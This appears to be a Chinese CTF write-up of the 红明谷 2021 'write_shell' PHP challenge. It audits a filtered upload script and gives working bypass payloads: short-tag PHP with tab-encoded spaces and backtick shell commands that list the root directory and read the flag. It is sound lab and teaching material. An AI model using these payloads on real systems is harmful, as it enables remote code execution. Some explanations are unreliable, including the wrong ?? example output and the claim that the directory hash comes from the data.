[红明谷CTF 2021]write_shell 1

代码审计

<?php
error_reporting(0);
highlight_file(__FILE__);
function check($input){
    if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){
        // if(preg_match("/'| |_|=|php/",$input)){
        die('hacker!!!');
    }else{
        return $input;
    }
}

function waf($input){
  if(is_array($input)){
      foreach($input as $key=>$output){
      //遍历数组
          $input[$key] = waf($output);
      }
  }else{
      $input = check($input);
  }
}

$dir = 'sandbox/' . md5($_SERVER['REMOTE_ADDR']) . '/';
if(!file_exists($dir)){
    mkdir($dir);  //创建文件夹
}
switch($_GET["action"] ?? "") {
    case 'pwd':
        echo $dir;
        break;
    case 'upload':
        $data = $_GET["data"] ?? "";
        waf($data);
        file_put_contents("$dir" . "index.php", $data);
    //  file_put_contents()   
    
}
?>

先了解下 ？？的作用

switch($_GET["action"] ?? "") 

?? 判断一个变量是否存在 ，存在则赋值变量本身，不存在赋值另一变量
?? 相当于：isset($a)? $a :$b;
是php7 推出来的
可以简单理解为 用于简便三元表达式

eg：

$a = $a ?? 1;
var_dump($a);//1


$a = 50
$a = $a ?? 1;
var_dump($a);//0

先看下面的代码：

switch($_GET["action"] ?? "") {
    case 'pwd':
        echo $dir;
        break;
    case 'upload':
        $data = $_GET["data"] ?? "";
        waf($data);
        file_put_contents("$dir" . "index.php", $data);
    //  file_put_contents()   
    
}

判断get传参（action）是否存在
当action = pwd 就会输出  dir
当action = upload 会检测我们的data是否存在 并对data进行一个过滤，并且作为 file_put_contents()的第三个参数

function check($input){
    if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){
        // if(preg_match("/'| |_|=|php/",$input)){
        die('hacker!!!');
    }else{
        return $input;
    }
}

function waf($input){
  if(is_array($input)){
      foreach($input as $key=>$output){
      //遍历数组
          $input[$key] = waf($output);
      }
  }else{
      $input = check($input);
  }
}

发现对data参数进行过滤（包括 php  eval 等），这里就在提示我们使用 php标签 

$dir = 'sandbox/' . md5($_SERVER['REMOTE_ADDR']) . '/';
if(!file_exists($dir)){
    mkdir($dir);  //创建文件夹

同时 我们输入的 data 进行MD5加密，在与sandbox进行结合
在生成新的文件加存放 $dir

所以，在本题我们的思路是：
先切换到 upload模式 传入数据参数 ，将数据存放到新文件夹
然后切换到 pwd模式 获得 MD5 加密后的dir
直接输入获得的密码 （查询以dir命名的文件夹）即可获得我们查询的内容

还有一个问题就是 本关的敏感次过滤问题

正则匹配绕过

php短标签

本关用到的短标签：

<?="1"?>	//相当于<?php echo "1";?>
<?echo"1"?>
<% echo"1";%>	//此标签有的版本行不通x

空格过滤饶过

%09   <    >   <>   $IFS$9   ${IFS}

单引号 包裹可以使用 ` 代替

echo `你好`

payload绕过

先访问：

http://71a146f3-19e0-4c62-8a38-959568523d.node4.buuoj.cn/?action=upload&data=<?echo%09`ls%09/`?>

再访问：

http://71a146f3-19e0-4c62-8a38-959568523d.node4.buuoj.cn/?action=pwd

再直接访问

http://71a146f3-19e0-4c62-8a38-959568523d.node4.buuoj.cn/sandbox/c47b21fcf8f0bc8b39201abd8024fd/

http://71a146f3-19e0-4c62-8a38-959568523d.node4.buuoj.cn/?action=upload&data=%3C?echo%09`cat%09/flllllll1112222222lag`?%3E

http://71a146f3-19e0-4c62-8a38-959568523d.node4.buuoj.cn/?action=pwd

http://71a146f3-19e0-4c62-8a38-959568523d.node4.buuoj.cn/sandbox/c47b21fcf8f0bc8b39201abd8024fd/